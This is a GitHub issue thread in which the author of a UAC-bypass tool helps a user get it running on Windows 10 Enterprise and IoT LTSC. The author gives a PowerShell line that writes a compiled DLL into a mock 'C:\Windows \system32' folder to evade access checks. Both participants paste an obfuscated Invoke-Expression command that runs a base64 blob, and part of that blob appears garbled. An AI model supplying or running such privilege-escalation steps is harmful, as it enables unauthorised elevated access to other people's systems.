### ISSUE TITLE
Access denied when copying sl0p.dll in C:\windows

### ISSUE THREAD

**Issue by keytrap-x86** [x0xr00t/Automated-MUlti-UAC-Bypass#20]
Despite using the latest version with no compilation errors, the script still fails with "access denied" while trying to copy the sl0p.dll in C:\windows folder.

The line that fails :

`Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Windows\system32\sl0p.dll"`

![image](https://github.com/x0xr00t/Automated-MUlti-UAC-Bypass/assets/17864005/2d7d42de-eedd-4c9d-9fca-fbbf429d577a)

**Comment by x0xr00t** [comment]
Can you try to change this in the ps1 file ? 
Change this .. 
Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Windows\system32\sl0p.dll"

to this 

Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Windows \system32\sl0p.dll"

this should send the file to the mock folder of the windows folder.

**Comment by keytrap-x86** [comment]
![noice](https://github.com/x0xr00t/Automated-MUlti-UAC-Bypass/assets/17864005/039ac9a4-9866-4998-853e-0d8a03e57d2a)

**Comment by x0xr00t** [comment]
ok i will have to see whats happening there. 
U said its ltsc version ?

**Comment by keytrap-x86** [comment]
> ok i will have to see whats happening there. U said its ltsc version ?

On my other machine I have used an Iot Entreprise LTSC 2021 version.
Now I'm on another machine which has Windows 10 Entreprise.

I have changed like you said to c:\windows \sl0p.dll and don't have access denied anymore.

Now a new problem appears :
In the cs file the Execute function has 2 parameters but the powershell seems to push only 1 parameter.

![noice](https://github.com/x0xr00t/Automated-MUlti-UAC-Bypass/assets/17864005/c96f5826-a617-41e3-a9b1-af5ecc137183)

**Comment by x0xr00t** [comment]
i will see if i can fix the issue tomorrow in the .cs

**Comment by keytrap-x86** [comment]
> i will see if i can fix the issue tomorrow in the .cs

Thank you. The problem seems to be in the powershell which calls the functions from the .cs file though

**Comment by x0xr00t** [comment]
Yeah remove the powershell command in the .INF part in the .CS file and it should work 
i will look tomorrow what up with that command so it works.

**Comment by x0xr00t** [comment]
remove this string for now 

powershell -c Start-Sleep -Seconds 5; Invoke-Expression ""$([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PAoJPGVjaG8gIiIsICJHZXQtV21pT2JqZWN0IC1xICdzZWxlY3QgKiBmcm9tIFNvZnR3YXJlcyIgfCANCjwvVG9waWM+CkNBQ1Q9Jzxicj4nLCAnICdNU0RFTlRTIE9iamVjdHMgDQo8L1N0eWxlPg0KPGJvZHk+DQo8PjA8IURPQ1RZUEU+IFhPUi1PcmlnaW5hbFBvaW50S2V5PC9GT09UWyJpbyJdOyBGT09UWyJiaW5nIl07Ijxicj4NCjwvVG9waWM+DQpUcnkgew0KICAgIiIsICIxMjM0IiwgIjEyMyIsICIiLCIiDQp9DQpTdHJpbmcgY2xvc3Mgew0KICAgIiIsICJjdXJsIiwgInN0b3JlIiwgIiIgfQ0KU3Ryb3ctV2luZG93Ow0KU2V0Rm9ybWF0aW9uV2luZG93KGluIFwiJykgZm9yIChzdHJpbmcgaWYgKCFzdHJpbmcgKlwiJykNCnsNCiAgIHRhc2traWxsIC9GIC8gLy9JTSBjbXBzdC5leGUgYmluYXJ5IQ0KICAgIFBhc3N3b3JkU3RhcnRJbmZvID0gIiclIjsNCiAgICBMZWFmIFJpbWUgPSBbMF0gIiIsICIiLCIiDQp9DQp9DQp9')))""

**Comment by keytrap-x86** [comment]
![noice](https://github.com/x0xr00t/Automated-MUlti-UAC-Bypass/assets/17864005/de756f0b-0d6b-423b-885d-31cbd813b716)

**Comment by x0xr00t** [comment]
i pushed a fix for the powershell in the .cs
let me know if it works @keytrap-x86

**Comment by keytrap-x86** [comment]
I have tried the new cs file.
I had a problem saying that there was an unexpected `$` caracter in the powershell command. I have removed it.
Tried again and it says that there's too much caracters in the powershell invocation :

powershell -c Start-Sleep -Seconds 5; Invoke-Expression "([System.Text.Encoding]
::UTF8.GetString([System.Convert]::FromBase64String('PAoJPGVjaG8gIiIsICJHZXQtV21pT2JqZWN0IC1xICdzZWxlY3QgKiBmcm9tIFNvZnR3YXJlcyIgfCANCjwvVG9
waWM+CkNBQ1Q9Jzxicj4nLCAnICdNU0RFTlRTIE9iamVjdHMgDQo8L1N0eWxlPg0KPGJvZHk+DQo8PjA8IURPQ1RZUEU+IFhPUi1PcmlnaW5hbFBvaW50S2V5PC9GT09UWyJpbyJdOyB
GT09UWyJiaW5nIl07Ijxicj4NCjwvVG9waWM+DQpUcnkgew0KICAgIiIsICIxMjM0IiwgIjEyMyIsICIiLCIiDQp9DQpTdHJpbmcgY2xvc3Mgew0KICAgIiIsICJjdXJsIiwgInN0b3J
lIiwgIiIgfQ0KU3Ryb3ctV2luZG93Ow0KU2V0Rm9ybWF0aW9uV2luZG93KGluIFwiJykgZm9yIChzdHJpbmcgaWYgKCFzdHJpbmcgKlwiJykNCnsNCiAgIHRhc2traWxsIC9GIC8gLy9
JTSBjbXBzdC5leGUgYmluYXJ5IQ0KICAgIFBhc3N3b3JkU3RhcnRJbmZvID0gIiclIjsNCiAgICBMZWFmIFJpbWUgPSBbMF0gIiIsICIiLCIiDQp9DQp9DQp9')))"

**Comment by x0xr00t** [comment]
Ok i will take that out for now, and can you send me the system information with powershell?
I have a the idea that ur missing a block for iot enterprise ltsc 2021 as its not supported in the .ps1 file.

If u can send me the system information pulled with powershell i can make a block for it.

**Comment by keytrap-x86** [comment]
I don't have access to the iot enterprise ltsc 2021 machine for now. But when I ran the script yesterday, I just replaced the Windows 10 Professionnal string with the corresponding string for the iot enterprise ltsc 2021 which was literally "Windows 10 Iot Entreprise LTSC 2021"

**Comment by x0xr00t** [comment]
I will see if i can add the block for you at the .ps1

**Comment by x0xr00t** [comment]
no not entirely, the stuff it checks is the string above  "windows 10 Enterprise"
it checks that with a switch function. So the Windows 10 Iot Entreprise LTSC 2021 need to be defined to see if the system is or is not this version, and if the block is missing it does not exec it due to missing the check for Windows 10 Iot Entreprise LTSC 2021.. their for is the block needed.

**Comment by keytrap-x86** [comment]
What I mean is why do you copy/paste the whole same block everytime ? I understand that the script checks the OS version and executes the block, but execpt the write-host ..., everything else is the same for each block. So why having all these blocks and not having only one function for example `Bypass($osVersion)` which will display OSVersion and start the script.

https://www.diffchecker.com/Qqcu89j1/

**Comment by x0xr00t** [comment]
well never looked in to making the code more efficient and smaller. As long all the versions blocks are supported it should be fine as is right.

**Comment by keytrap-x86** [comment]
This is the same but without duplicating code :

```powershell
```

**Comment by keytrap-x86** [comment]
I have updated my script (I have mistaken the first time, it's `Windows 10 IoT Enterprise LTSC 2021` and not `Windows 10 IoT Entreprise LTSC 2021`). Anyways, for now the bypass doesn't work for me because of this maximum payload caracters. I'm not sure with what I'm supposed to replace the base64 line in the .cs file. When you have time if you could check this problem and ideally make a little gif like in your other repo https://github.com/x0xr00t/sl0ppy-defender-evasion It would be great and easier to follow

**Comment by x0xr00t** [comment]
try putting in a small command like systeminfo in to b64, see if that exec it.

**Comment by x0xr00t** [comment]
v.1.5.5-beta rolled out with the code u provided, including the OS information for the IOT version u on. I took out the powershell command in the .cs and compiled the dll. I included the dll, in the new release. 

Let me know how things go with the new release, if it works or not. 
@keytrap-x86
